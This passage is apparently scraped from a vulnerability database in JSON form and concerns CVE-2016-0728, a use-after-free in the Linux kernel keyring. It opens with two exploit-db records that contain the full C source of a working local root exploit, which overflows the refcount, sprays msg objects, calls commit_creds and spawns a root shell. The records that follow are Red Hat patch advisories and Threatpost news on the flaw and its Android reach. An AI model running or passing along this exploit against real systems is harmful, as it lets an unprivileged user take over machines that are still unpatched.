Local exploit for linux platform", "published": "2016-01-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EDB-ID:40003", "href": "https://www.exploit-db.com/exploits/40003/", "sourceData": "/*\r\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n*/\r\n\r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n\r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n\r\n\r\n\r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n\r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if 
(f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n\r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n\r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n\r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n\r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\r\n }\r\n\r\n my_key_type = malloc(sizeof(*my_key_type));\r\n\r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n\r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n\r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned 
long)my_key_type;\r\n\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n\r\n keyring_name = argv[1];\r\n\r\n /* Set the new session keyring before we start */\r\n\r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n\r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n\r\n\r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n\r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n\r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n\r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n\r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n\r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n\r\n return 0;\r\n}", "cvss": {"score": 7.2, 
"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40003/"}, {"lastseen": "2016-02-04T09:49:49", "description": "Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings. CVE-2016-0728. Local exploit for linux platform", "published": "2016-01-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EDB-ID:39277", "href": "https://www.exploit-db.com/exploits/39277/", "sourceData": "# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n\r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n\r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* \r\n_prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n\r\n\r\n\r\nstruct key_type {\r\n\tchar * name;\r\n \tsize_t datalen;\r\n \tvoid * vet_description;\r\n \tvoid * preparse;\r\n \tvoid * free_preparse;\r\n \tvoid * instantiate;\r\n \tvoid * update;\r\n \tvoid * match_preparse;\r\n \tvoid * match_free;\r\n \tvoid * revoke;\r\n \tvoid * 
destroy;\r\n};\r\n\r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tint ret;\r\n\r\n\tf = fopen(\"/proc/kallsyms\", \"r\");\r\n\tif (f == NULL) {\r\n\t\tfprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\nvoid userspace_revoke(void * key) {\r\n \tcommit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nint main(int argc, const char *argv[]) {\r\n\tconst char *keyring_name;\r\n\tsize_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n\tkey_serial_t serial = -1;\r\n\tpid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n\r\n struct {\r\n\t\tlong mtype;\r\n\t\tchar mtext[STRUCT_LEN];\r\n\t} msg = {0x4141414141414141, {0}};\r\n\tint msqid;\r\n\r\n\tif (argc != 2) {\r\n\t\tputs(\"usage: ./keys <key_name>\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n \tprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n\tcommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n \tprepare_kernel_cred = \r\n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n\tif(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n\t\tcommit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 \r\n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n \tputs(\"[-] You probably need to change the address of \r\ncommit_creds and prepare_kernel_cred in 
source\");\r\n\t}\r\n\r\n \tmy_key_type = malloc(sizeof(*my_key_type));\r\n\r\n \tmy_key_type->revoke = (void*)userspace_revoke;\r\n \tmemset(msg.mtext, 'A', sizeof(msg.mtext));\r\n\r\n \t// key->uid\r\n \t*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n \t//key->perm\r\n \t*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n\r\n \t//key->type\r\n \t*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n\r\n \tif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n \t\tperror(\"msgget\");\r\n \texit(1);\r\n \t}\r\n\r\n \tkeyring_name = argv[1];\r\n\r\n\t/* Set the new session keyring before we start */\r\n\r\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n\tif (serial < 0) {\r\n\t\tperror(\"keyctl\");\r\n\t\treturn -1;\r\n \t}\r\n\r\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \r\nKEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n\t\tperror(\"keyctl\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\r\n\tputs(\"[+] Increfing...\");\r\n \tfor (i = 1; i < 0xfffffffd; i++) {\r\n \tif (i == (0xffffffff - l)) {\r\n \t\tl = l/2;\r\n \t\tsleep(5);\r\n \t}\r\n \tif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n \t\tperror(\"[-] keyctl\");\r\n \t\treturn -1;\r\n \t}\r\n \t}\r\n \tsleep(5);\r\n \t/* here we are going to leak the last references to overflow */\r\n \tfor (i=0; i<5; ++i) {\r\n \tif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n \t\tperror(\"[-] keyctl\");\r\n \t\treturn -1;\r\n \t}\r\n \t}\r\n\r\n \tputs(\"[+] Finished increfing\");\r\n \tputs(\"[+] Forking...\");\r\n \t/* allocate msg struct in the kernel rewriting the freed keyring \r\nobject */\r\n \tfor (i=0; i<64; i++) {\r\n \tpid = fork();\r\n \tif (pid == -1) {\r\n \t\tperror(\"[-] fork\");\r\n \t\treturn -1;\r\n \t}\r\n\r\n \tif (pid == 0) {\r\n \t\tsleep(2);\r\n \t\tif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n \t\tperror(\"[-] msgget\");\r\n \t\texit(1);\r\n \t\t}\r\n \t\tfor (i = 0; i < 64; i++) {\r\n \t\tif (msgsnd(msqid, 
&msg, sizeof(msg.mtext), 0) == -1) {\r\n \t\t\tperror(\"[-] msgsnd\");\r\n \t\t\texit(1);\r\n \t\t}\r\n \t\t}\r\n \t\tsleep(-1);\r\n \t\texit(1);\r\n \t}\r\n \t}\r\n\r\n \tputs(\"[+] Finished forking\");\r\n \tsleep(5);\r\n\r\n \t/* call userspace_revoke from kernel */\r\n \tputs(\"[+] Caling revoke...\");\r\n \tif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n \tperror(\"[+] keyctl_revoke\");\r\n \t}\r\n\r\n \tprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n \texecl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n\r\n \treturn 0;\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39277/"}], "redhat": [{"lastseen": "2019-08-13T18:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
The system must be\nrebooted for this update to take effect.", "modified": "2018-03-19T16:29:53", "published": "2016-01-25T23:47:39", "id": "RHSA-2016:0065", "href": "https://access.redhat.com/errata/RHSA-2016:0065", "type": "redhat", "title": "(RHSA-2016:0065) Important: kernel-rt security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.", "modified": "2018-04-12T03:32:56", "published": "2016-01-25T23:47:36", "id": "RHSA-2016:0064", "href": "https://access.redhat.com/errata/RHSA-2016:0064", "type": "redhat", "title": "(RHSA-2016:0064) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805", "CVE-2015-8104", "CVE-2016-0728", "CVE-2016-0774"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the x86 ISA (Instruction Set Architecture) is prone to\na denial of service attack inside a virtualized environment in the form of\nan infinite loop in the microcode due to the way (sequential) delivering of\nbenign exceptions such as #DB (debug exception) is handled. 
A privileged\nuser inside a guest could use this flaw to create denial of service\nconditions on the host kernel. (CVE-2015-8104, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\n* It was found that the fix for CVE-2015-1805 incorrectly kept buffer\noffset and buffer length in sync on a failed atomic read, potentially\nresulting in a pipe buffer state corruption. A local, unprivileged user\ncould use this flaw to crash the system or leak kernel memory to user\nspace. (CVE-2016-0774, Moderate)\n\nRed Hat would like to thank the Perception Point research team for\nreporting the CVE-2016-0728 issue. The security impact of the CVE-2016-0774\nissue was discovered by Red Hat.\n\nBug fixes:\n\n* NMI watchdog of guests using legacy LVT0-based NMI delivery did not work\nwith APICv. Now, NMI works with LVT0 regardless of APICv. (BZ#1244726)\n\n* Parallel file-extending direct I/O writes could previously race to update\nthe size of the file. If they executed out-of-order, the file size could\nmove backwards and push a previously completed write beyond the end of the\nfile, causing it to be lost. (BZ#1258942)\n\n* The GHES NMI handler had a global spin lock that significantly increased\nthe latency of each perf sample collection. This update simplifies locking\ninside the handler. (BZ#1280200)\n\n* Sometimes, iptables rules are updated along with ip rules, and routes are\nreloaded. Previously, skb->sk was mistakenly attached to some IPv6\nforwarding traffic packets, which could cause kernel panic. Now, such\npackets are checked and not processed. 
(BZ#1281700)\n\n* The NUMA node was not reported for PCI adapters, which affected every\nPOWER system deployed with Red Hat Enterprise Linux 7 and caused\nsignificant decrease in the system performance. (BZ#1283525)\n\n* Processing packets with a lot of different IPv6 source addresses caused\nthe kernel to return warnings concerning soft-lockups due to high lock\ncontention and latency increase. (BZ#1285369)\n\n* Running edge triggered interrupts with an ack notifier when\nsimultaneously reconfiguring the Intel I/O IOAPIC did not work correctly,\nso EOI in the interrupt did not cause a VM to exit if APICv was enabled.\nConsequently, the VM sometimes became unresponsive. (BZ#1287001)\n\n* Block device readahead was artificially limited, so the read performance\nwas poor, especially on RAID devices. Now, per-device readahead limits are\nused for each device, which has improved read performance. (BZ#1287548)\n\n* Identical expectations could not be tracked simultaneously even if they\nresided in different connection tracking zones. Now, an expectation insert\nattempt is rejected only if the zone is also identical. (BZ#1290093)\n\n* The storvsc kernel driver for Microsoft Hyper-V storage was setting\nincorrect SRB flags, and Red Hat Enterprise Linux 7 guests running on\nMicrosoft Hyper-V were experiencing slow I/O as well as I/O failures when\nthey were connected to a virtual SAN. Now, SRB flags are set correctly.\n(BZ#1290095)\n\n* When a NUMA system with no memory in node 0 was used, the system\nterminated unexpectedly during boot or when using OpenVSwitch. Now, the\nkernel tries to allocate memory from other nodes when node 0 is not\npresent. 
(BZ#1300950)\n\nEnhancement:\n\n* IPsec has been updated to provide many fixes and some enhancements.\nOf particular note is the ability to match on outgoing interfaces.\n(BZ#1287407)", "modified": "2016-04-04T19:57:06", "published": "2016-02-02T21:05:39", "id": "RHSA-2016:0103", "href": "https://access.redhat.com/errata/RHSA-2016:0103", "type": "redhat", "title": "(RHSA-2016:0103) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7421", "CVE-2014-8171", "CVE-2014-9644", "CVE-2015-2925", "CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:29", "published": "2016-01-26T05:00:00", "id": "RHSA-2016:0068", "href": "https://access.redhat.com/errata/RHSA-2016:0068", "type": "redhat", "title": "(RHSA-2016:0068) Important: kernel-rt security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:52", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "A patch for a critical Linux kernel flaw, present in the code since 2012, is expected to be pushed out today.\n\nThe vulnerability affects versions 3.8 and higher, said researchers at startup Perception Point who discovered the vulnerability. The flaw also extends to two-thirds of Android devices, the company added.\n\n\u201cIt\u2019s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,\u201d Yevgeny Pats, cofounder and CEO of Perception Point. \u201cWith no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.\u201d\n\nPats said an attacker would require local access to exploit the vulnerability on a Linux server. A malicious mobile app would get the job done on an Android device (Kit-Kat and higher), he said. Pats added that exploitation of the flaw is fairly straightforward, but it\u2019s unknown whether it\u2019s been attacked to date.\n\n\u201cThe fix was simple,\u201d Pats said. \u201cThe problem is not all devices Linux get patched automatically.\u201d\n\nThe vulnerability, CVE-2016-0728, lives in the keyring facility built into the various flavors of Linux. The keyring encrypts and stores login information, encryption keys and certificates, and makes them available to applications. 
In a report published by Perception Point, researchers said the vulnerability is a [reference leak](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) that can be abused to ultimately execute code in the Linux kernel.\n\n\u201cUser space applications give [keyring] the option to manage the crypto keys,\u201d Pats said. \u201cThe user doesn\u2019t have to manage keys; the OS does it for the application. Apps use it for security reasons. When they want to apps to work with crypto, they use this feature. The feature has kernel access; the OS gives the userland app the ability to use this feature. The problem is that the code runs in the kernel.\u201d\n\nPats said that SMEP (Supervisor Mode Execution Protection) and SMAP (Supervisor Mode Access Protection) make exploitation difficult on Linux servers, while SELinux does the same for Android devices. SMEP and SMAP are relatively new features that prevent the kernel from accessing and executing code from userland.\n\nThe flaw may linger a little longer on Android devices, since most updates are not pushed automatically by carriers and manufacturers. 
Android is built upon the Linux kernel, but customized without many of the libraries that accompany standard Linux builds.\n\nPerception Point published a technical analysis of the vulnerability and how to exploit it, including [proof-of-concept code](<https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f>) published to its Github page.\n", "modified": "2016-01-20T20:41:01", "published": "2016-01-19T07:47:18", "id": "THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD", "href": "https://threatpost.com/serious-linux-kernel-vulnerability-patched/115923/", "type": "threatpost", "title": "Linux Kernel Privilege Escalation Flaw Patched", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "Google is downplaying the scope of the [critical Linux vulnerability](<https://threatpost.com/serious-linux-kernel-vulnerability-patched/115923/>) patched this week, suggesting that the number of affected Android devices has been exaggerated.\n\nThe Android OS is built upon the Linux kernel, but minus many of the libraries that are included in standard Linux builds. Initially, startup Perception Point said that upwards of two-thirds of Android devices would be affected by the vulnerability. The flaw, introduced into the Linux source code in 2012, could be abused by a local attacker to elevate privileges on a Linux server or Android phone via a malicious mobile application.\n\nOn its end, [Google has patched the flaw](<https://plus.google.com/+AdrianLudwig/posts/KxHcLPgSPoY>) in the Android code and on Wednesday released the fix to open source and its partners. 
Google\u2019s Adrian Ludwig, lead engineer for Android security, said the patch would be required on all devices with a patch level of March 1, 2016 or greater.\n\nLudwig, however, took issue with Perception Point\u2019s estimates that as many as 66 percent of devices were affected.\n\n\u201cWe believe that the number of Android devices affected is significantly smaller than initially reported,\u201d Ludwig said, adding that Perception Point did not privately disclose the vulnerability to Google or the Android security team as it did with the Linux security team.\n\nPerception Point cofounder and CEO Yevgeny Pats told Threatpost this week that it was unknown whether the flaw was under attack.\n\nLudwig, meanwhile, said that while the vulnerability affects Linux versions 3.8 and higher, significantly fewer versions of Android are affected.\n\n\u201cWe believe that no Nexus devices are vulnerable to exploitation by third party applications. Further, devices with Android 5.0 and above are protected, as the Android SELinux policy prevents third party applications from reaching the affected code,\u201d Ludwig said. \u201cAlso, many devices running Android 4.4 and earlier do not contain the vulnerable code introduced in Linux kernel 3.8, as those newer kernel versions are not common on older Android devices.\u201d\n\nPerception Point provided Threatpost with a statement this morning:\n\n> \u201cAs stated, the bug affects android versions with KitKat and higher and it doesn\u2019t matter if the device has SELinux enabled or not. SELinux only affects the exploitation potential and as stated in the [blog](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) our research team is working on an exploitation for Android devices with SELinux enabled. The results of that will be published in the next blogpost. Nexus with the newest version comes with the keyring feature compiled in. 
So we are still standing behind the ~66% of all android devices are affected by the bug.\u201d\n\nAccording to the [Android developers dashboard](<http://developer.android.com/about/dashboards/index.html>), 33.3 percent of devices are on the most recent versions of Android (Lollipop 5.0 and 5.1, and Marshmallow 6.0), while 36.1 percent of devices are on Android 4.4 (KitKat) and 24.7 percent are running Jelly Bean (4.1, 4.2, 4.3). Duo Labs, meanwhile, published a report this week that said most [Android devices are woefully out of date](<https://duo.com/blog/duo-analytics-android-device-security-article>) and fail basic security hygiene such as enabling a passcode. The report said that one in 20 Android devices are rooted (by comparison, Duo Labs said one in 250 iPhones are jailbroken), and that one in 10 devices don\u2019t have pre-boot passcode device encryption enabled.\n\nThe vulnerability, CVE-2016-0728, lives in the keyring facility built into the various flavors of Linux. The keyring encrypts and stores login information, encryption keys and certificates, and makes them available to applications. In a report published by Perception Point, researchers said the vulnerability is a reference leak that can be abused to ultimately execute code in the Linux kernel.\n\n\u201cUser space applications give [keyring] the option to manage the crypto keys,\u201d Pats said. \u201cThe user doesn\u2019t have to manage keys; the OS does it for the application. Apps use it for security reasons. When they want to apps to work with crypto, they use this feature. The feature has kernel access; the OS gives the userland app the ability to use this feature. 
The problem is that the code runs in the kernel.\u201d\n", "modified": "2016-01-21T16:46:56", "published": "2016-01-21T11:45:56", "id": "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "href": "https://threatpost.com/google-challenges-number-of-android-devices-affected-by-linux-flaw-1/115966/", "type": "threatpost", "title": "Android Devices Linux Zero Day Kernel Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:42", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728", "CVE-2016-0815", "CVE-2016-0816", "CVE-2016-0818", "CVE-2016-0819", "CVE-2016-0820", "CVE-2016-1621"], "description": "Google today patched two critical holes in its problematic Android Mediaserver component which would allow an attacker to use email, web browsing, and MMS processing of media files to remotely execute code. With this latest vulnerability, Google has patched its Mediaserver more than two dozen times since the [Stagefright vulnerability](<https://threatpost.com/android-stagefright-flaws-put-950-million-devices-at-risk/113960/>) was discovered in August.\n\nThe patch is part of Google\u2019s monthly over-the-air security update for Android Nexus devices. In total, Google identified 16 vulnerabilities as part of this month\u2019s [Android Nexus Security Bulletin](<https://source.android.com/security/bulletin/>), of which six were rated as critical, eight as high and two as moderate. Google said a Nexus patch would be available within the next 48 hours and available at the Android Open Source Project repository. It says wireless carriers and device makers were made aware of the upcoming security bulletin on Feb. 1.\n\nAccording to Google, the critical flaws could enable remote code execution on an affected device via email, web browsing, and MMS when processing media files. 
